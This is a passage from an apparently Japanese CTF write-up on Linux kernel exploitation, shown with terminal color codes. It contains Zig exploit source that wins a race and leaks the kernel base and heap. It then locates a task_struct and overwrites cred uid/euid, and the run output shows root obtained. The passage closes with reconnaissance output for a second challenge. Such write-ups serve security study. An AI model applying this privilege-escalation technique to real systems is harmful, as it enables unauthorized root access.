�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[36m0xffffffff�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xdeadbeef�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_ADDROF_RDX_RCX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_EAX_ADDROF_RDX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81c3afe0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakHeap�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mld_semaphore�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ldisc_sem"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@typeInfo�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mld_semaphore�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"read_wait"�[0m�[1m�[37m)).�[0m�[1m�[37m@�[0m�[33m"struct"�[0m�[1m�[37m.�[0m�[1m�[37mfields�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m].�[0m�[1m�[36mtype�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37moffset�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mrace�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mgetTty�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m+�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakHeap�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mprctl�[0m�[1m�[37m(.�[0m�[1m�[37mSET_NAME�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[33m"okamikun"�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[36m0x1000000�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mcreds�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37maddr�[0m�[1m�[37m �[0m�[1m�[36m<�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[1m�[36m0x1000000�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37maddr�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[36m0x8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m((�[0m�[1m�[37maddr�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m �[0m�[1m�[36m0xfffff�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"searching... 0x{s}�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37maddr�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"okamikun"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37msliceAsBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu32�[0m�[1m�[37m{�[0m�[33mtry�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m+�[0m�[1m�[36m0x4�[0m�[1m�[37m)})))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// task_struct is huge, I ain't copying that!�[0m
�[1m�[37m �[0m�[33m// just remember that `comm` comes immediately after `creds`.�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37msliceAsBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu32�[0m�[1m�[37m{�[0m�[33mtry�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37maddr�[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m)�[0m�[1m�[36m+�[0m�[1m�[36m0x4�[0m�[1m�[37m)})),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m...
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mHeapScanFailed�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"task_struct.creds = 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mcreds�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mcred�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"uid"�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mcred�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"euid"�[0m�[1m�[37m)})�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37moffset�[0m�[1m�[36m|�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mcreds�[0m�[1m�[36m+�[0m�[1m�[37moffset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37mwhoami�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mcred�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37musage�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mgid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msuid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msgid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37meuid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37megid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfsuid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfsgid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Won the race�[0m
�[1m�[37m[INFO] Heap spray succeeded on core 0�[0m
�[1m�[37m[INFO] Kernel base: 0xffffffff89400000�[0m
�[1m�[37msearching... 0xffff89f501f00000�[0m
�[1m�[37msearching... 0xffff89f502000000�[0m
�[1m�[37msearching... 0xffff89f502100000�[0m
�[1m�[37msearching... 0xffff89f502200000�[0m
�[1m�[37msearching... 0xffff89f502300000�[0m
�[1m�[37msearching... 0xffff89f502400000�[0m
�[1m�[37msearching... 0xffff89f502500000�[0m
�[1m�[37msearching... 0xffff89f502600000�[0m
�[1m�[37msearching... 0xffff89f502700000�[0m
�[1m�[37msearching... 0xffff89f502800000�[0m
�[1m�[37msearching... 0xffff89f502900000�[0m
�[1m�[37msearching... 0xffff89f502a00000�[0m
�[1m�[37msearching... 0xffff89f502b00000�[0m
�[1m�[37msearching... 0xffff89f502c00000�[0m
�[1m�[37msearching... 0xffff89f502d00000�[0m
�[1m�[37msearching... 0xffff89f502e00000�[0m
�[1m�[37msearching... 0xffff89f502f00000�[0m
�[1m�[37msearching... 0xffff89f503000000�[0m
�[1m�[37msearching... 0xffff89f503100000�[0m
�[1m�[37msearching... 0xffff89f503200000�[0m
�[1m�[37m[INFO] task_struct.creds = 0xffff89f503363a00�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なexploit
ちょっとムラだが、root権限昇格した!
== �[1m�[4mAngus�[22m�[24m
課題情報
�[1m�[37m[*] './angus/qemu/rootfs/root/angus.ko'�[0m
�[1m�[37m Arch: amd64-64-little�[0m
�[1m�[37m RELRO: No RELRO�[0m
�[1m�[37m Stack: No canary found�[0m
�[1m�[37m NX: NX enabled�[0m
�[1m�[37m PIE: No PIE (0x0)�[0m
�[1m�[37m Stripped: No�[0m
�[1m�[37mgrep /proc/cpuinfo -q -e �[0m�[33m'smep'�[0m�[1m�[37m �[0m�[1m�[36m&&�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'SMEP enabled'�[0m�[1m�[37m�[0m
�[1m�[37mgrep /proc/cpuinfo -q -e �[0m�[33m'smap'�[0m�[1m�[37m �[0m�[1m�[36m&&�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'SMAP enabled'�[0m�[1m�[37m�[0m
�[1m�[37mgrep /sys/devices/system/cpu/vulnerabilities/meltdown -q -e �[0m�[33m'PTI'�[0m�[1m�[37m �[0m�[1m�[36m&&�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'KPTI enabled'�[0m�[1m�[37m�[0m
�[1m�[37mgrep /proc/cmdline -q -e �[0m�[33m'nokaslr'�[0m�[1m�[37m �[0m�[1m�[36m||�[0m�[1m�[37m �[0m�[37mecho�[0m�[1m�[37m �[0m�[33m'KASLR enabled'�[0m�[1m�[37m�[0m
�[1m�[37mSMEP enabled�[0m
�[1m�[37mKPTI enabled�[0m
�[1m�[37mKASLR enabled�[0m
�[1m�[37mffffffffb8c00000 T startup_64�[0m
�[1m�[37mffffffffb8c00040 T secondary_startup_64�[0m
�[1m�[37mffffffffb8c00045 T secondary_startup_64_no_verify�[0m
�[1m�[37mffffffffb8c00240 T __startup_64�[0m
�[1m�[37mffffffffb8c005f0 T startup_64_setup_env�[0m
�[1m�[37mffffffffb8c72810 T commit_creds�[0m
�[1m�[37mffffffffb8c729b0 T prepare_kernel_cred�[0m
�[1m�[37mffffffffb9400e10 T swapgs_restore_regs_and_return_to_usermode�[0m
ま、この課題は単純明快だね。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mangus_ioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mINIT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370001�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mSETKEY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370002�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mSETDATA�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370003�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
